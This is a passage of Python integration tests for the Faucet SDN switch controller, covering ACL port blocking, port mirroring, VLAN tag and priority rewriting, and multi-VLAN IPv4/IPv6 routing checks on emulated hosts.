class FaucetUntaggedACLTcpMaskTest(FaucetUntaggedACLTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
# Masked match: any dst port with the 1024 bit set (1024-2047, 3072-4095, ...)
tcp_dst: 1024/1024
actions:
allow: 0
- rule:
actions:
allow: 1
"""
def test_port_gt1023_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(1024, first_host, second_host, mask=1024)
self.verify_tp_dst_notblocked(1023, first_host, second_host, table_id=None)
class FaucetUntaggedVLANACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
actions:
allow: 1
vlans:
100:
description: "untagged"
acl_in: 1
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
class FaucetUntaggedOutputOnlyTest(FaucetUntaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
output_only: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1'])},
table_id=self._VLAN_TABLE,
actions=[])
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertEqual(100.0, self.ping((first_host, second_host)))
self.assertEqual(0, self.ping((third_host, second_host)))
class FaucetUntaggedACLMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
def test_eapol_mirrored(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_eapol_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedOrderedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
- ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetMultiOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
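# The multi_out ACL copies traffic from port 1 to ports 2 and 3 (port 3 is on a
# different native VLAN) but not to port 4.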
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetMultiOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
- ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetUntaggedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
vlan_vid: 123
set_fields:
- eth_dst: "06:06:06:06:06:06"
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- vlan_vid: 123
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [123, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [123, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiConfVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
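# 0x88a8 is the 802.1ad (QinQ) ethertype used for the outer VLAN tag.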
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMultiConfVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten address and VLAN
tcpdump_filter = 'ether proto 0x88a8'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
self.assertTrue(re.search(
'vlan 456.+ethertype 802.1Q-QinQ, vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.flap_all_switch_ports()
# Add mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', self.port_map['port_1'],
restart=True, cold_start=False)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
# Remove mirror, test performance.
self.change_port_config(
self.port_map['port_3'], 'mirror', [],
restart=True, cold_start=False)
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
output_only: True
%(port_4)d:
output_only: True
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
ping_pairs = (
(first_host, second_host),
(second_host, first_host))
self.flap_all_switch_ports()
self.change_port_config(
self.port_map['port_3'], 'mirror',
[self.port_map['port_1'], self.port_map['port_2']],
restart=True, cold_start=False, hup=True)
self.verify_ping_mirrored_multi(
ping_pairs, mirror_host, both_mirrored=True)
class FaucetUntaggedMultiMirrorSepTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
mirror: %(port_1)d
%(port_4)d:
mirror: %(port_1)d
"""
def test_untagged(self):
self.flap_all_switch_ports()
# Make sure both mirror ports receive traffic mirrored from port 1
first_host, second_host = self.hosts_name_ordered()[0:2]
mirror_host = self.hosts_name_ordered()[2]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
mirror_host = self.hosts_name_ordered()[3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedTest(FaucetTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = CONFIG_TAGGED_BOILER
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=4, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_tagged(self):
# Untagged traffic is specifically dropped.
for host in self.hosts_name_ordered():
host.cmd(self.scapy_dhcp(host.MAC(), host.intf_root_name, count=3))
for port in self.port_map.values():
self.wait_nonzero_packet_count_flow(
{'in_port': port, 'vlan_tci': '0x0000/0x1fff'}, table_id=self._VLAN_TABLE)
self.ping_all_when_learned()
class FaucetTaggedDTPTest(FaucetTaggedTest):
def test_tagged(self):
for host in self.hosts_name_ordered():
scapy_txt = host.cmd(
('python3 -c \"import sys ; from scapy.contrib.dtp import * ;'
'negotiate_trunk(iface=\'%s\')\"' % host.intf_root_name))
self.assertTrue(re.search('Sent 1 packets', scapy_txt), msg=scapy_txt)
super().test_tagged()
class FaucetTaggedMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
# port 3 will mirror port 1
mirror: %(port_1)d
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.flap_all_switch_ports()
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
first_host_ip = ipaddress.ip_address(first_host.IP())
second_host_ip = ipaddress.ip_address(second_host.IP())
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip, second_host_ip,
sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
tagged_ports = (self.port_map['port_1'], self.port_map['port_2'], self.port_map['port_4'])
for port in tagged_ports:
self.wait_until_matching_flow(
{'vlan_vid': 100, 'in_port': port},
table_id=self._VLAN_TABLE,
actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
self.change_port_config(
self.port_map['port_3'], 'mirror', None,
restart=True, cold_start=False)
for port in tagged_ports:
self.wait_until_matching_flow(
{'vlan_vid': 100, 'in_port': port},
table_id=self._VLAN_TABLE,
actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
class FaucetTaggedVLANPCPTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedVLANPCPOrderedTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
vlan_pcp: 1
actions:
output:
- set_fields:
- vlan_pcp: 2
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.quiet_commands(
first_host,
['ip link set %s type vlan egress %u:1' % (
first_host.defaultIntf(), i) for i in range(0, 8)])
self.one_ipv4_ping(first_host, second_host.IP())
self.wait_nonzero_packet_count_flow(
{'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
tcpdump_filter = 'ether dst %s' % second_host.MAC()
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedGlobalIPv4RouteTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
IPV = 4
NETPREFIX = 24
ETH_TYPE = IPV4_ETH
NETNS = True
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
@staticmethod
def netbase(vid, host):
return ipaddress.ip_interface('192.168.%u.%u' % (vid, host))
def fping(self, macvlan_int, ipg):
return 'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def fib_table(self):
return self._IPV4_FIB_TABLE
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv4_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["192.168.%u.254/24"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v4: True
max_wildcard_table_size: 1024
table_sizes:
vlan: %u
vip: %u
flood: %u
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(),
len(STR_VIDS) * 3, # VLAN
len(STR_VIDS) * 2, # VIP
len(STR_VIDS) * 12, # Flood
'%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
def configure_mesh(self, first_host, second_host):
hosts = (first_host, second_host)
required_ipds = set()
ipd_to_macvlan = {}
for i, host in enumerate(hosts, start=1):
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
macvlan_int = 'macvlan%u' % vid
ipa = self.netbase(vid, i)
ipg = self.netbase(vid, 254)
ipd = self.netbase(vid, 253)
required_ipds.add(str(ipd.ip))
ipd_to_macvlan[str(ipd.ip)] = (macvlan_int, host)
setup_commands.extend([
self.run_ip('link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid)),
self.run_ip('link set dev %s up' % vlan_int),
self.run_ip('link add %s link %s type macvlan mode vepa' % (macvlan_int, vlan_int)),
self.run_ip('link set dev %s up' % macvlan_int),
self.run_ip('address add %s/%u dev %s' % (ipa.ip, self.NETPREFIX, macvlan_int)),
self.run_ip('route add default via %s table %u' % (ipg.ip, vid)),
self.run_ip('rule add from %s table %u priority 100' % (ipa, vid)),
# stimulate learning attempts for a host that is down.
self.run_ip('neigh add %s lladdr %s dev %s' % (ipd.ip, self.FAUCET_MAC, macvlan_int))])
# add a route via FAUCET to the other host in the same connected subnet,
# so that routing is exercised.
for j, _ in enumerate(hosts, start=1):
if j != i:
other_ip = self.netbase(vid, j)
setup_commands.append(
self.run_ip('route add %s via %s table %u' % (other_ip, ipg.ip, vid)))
for ipa in (ipg.ip, ipd.ip):
setup_commands.append(self.fping(macvlan_int, ipa))
self.quiet_commands(host, setup_commands)
return required_ipds, ipd_to_macvlan
def verify_drop_rules(self, required_ipds, ipd_to_macvlan):
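# FAUCET should install FIB flows with no actions (drop rules) for the unresolvable
# .253 neighbor addresses pinged during setup; re-ping and poll until one exists per VID.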
for _ in range(10):
if not required_ipds:
break
drop_rules = self.get_matching_flows_on_dpid(
self.dpid, {'dl_type': self.ETH_TYPE, 'dl_vlan': str(self.GLOBAL_VID)},
table_id=self.fib_table(), actions=[])
if drop_rules:
for drop_rule in drop_rules:
match = drop_rule['match']
del match['dl_type']
del match['dl_vlan']
self.assertEqual(1, len(match))
ipd = list(match.values())[0].split('/')[0]
if ipd in required_ipds:
required_ipds.remove(ipd)
for ipd in required_ipds:
macvlan_int, host = ipd_to_macvlan[ipd]
host.cmd(self.fping(macvlan_int, ipd))
time.sleep(1)
self.assertFalse(required_ipds, msg='no drop rules for %s' % required_ipds)
def verify_routing_performance(self, first_host, second_host):
for first_host_ip, second_host_ip in (
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[0], 2)),
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[-1], 2)),
(self.netbase(self.NEW_VIDS[-1], 1), self.netbase(self.NEW_VIDS[0], 2))):
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.scapy_bcast(first_host))
def verify_l3_mesh(self, first_host, second_host):
for vid in self.NEW_VIDS:
macvlan_int = 'macvlan%u' % vid
first_host_ip = self.netbase(vid, 1)
second_host_ip = self.netbase(vid, 2)
self.macvlan_ping(first_host, second_host_ip.ip, macvlan_int)
self.macvlan_ping(second_host, first_host_ip.ip, macvlan_int)
def verify_l3_hairpin(self, first_host):
macvlan1_int = 'macvlan%u' % self.NEW_VIDS[0]
macvlan2_int = 'macvlan%u' % self.NEW_VIDS[1]
macvlan2_ip = self.netbase(self.NEW_VIDS[1], 1)
macvlan1_gw = self.netbase(self.NEW_VIDS[0], 254)
macvlan2_gw = self.netbase(self.NEW_VIDS[1], 254)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
[self.run_ip('link set %s netns %s' % (macvlan2_int, netns))])
for exec_cmd in (
(self.run_ip('address add %s/%u dev %s' % (macvlan2_ip.ip, self.NETPREFIX, macvlan2_int)),
self.run_ip('link set %s up' % macvlan2_int),
self.run_ip('route add default via %s' % macvlan2_gw.ip))):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
setup_cmds.append(
self.run_ip('route add %s via %s' % (macvlan2_ip, macvlan1_gw.ip)))
self.quiet_commands(first_host, setup_cmds)
self.macvlan_ping(first_host, macvlan2_ip.ip, macvlan1_int)
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
required_ipds, ipd_to_macvlan = self.configure_mesh(first_host, second_host)
self.verify_drop_rules(required_ipds, ipd_to_macvlan)
self.verify_routing_performance(first_host, second_host)
self.verify_l3_mesh(first_host, second_host)
self.verify_l3_hairpin(first_host)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedGlobalIPv6RouteTest(FaucetTaggedGlobalIPv4RouteTest):
IPV = 6
NETPREFIX = 112
ETH_TYPE = IPV6_ETH
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 103))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
def netbase(self, vid, host):
return ipaddress.ip_interface('fc00::%u:%u' % (vid, host))
def fib_table(self):
return self._IPV6_FIB_TABLE
def fping(self, macvlan_int, ipg):
return 'fping6 %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv6_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["fc00::%u:254/112"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v6: True
max_wildcard_table_size: 512
table_sizes:
vlan: 256
vip: 128
flood: 384
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
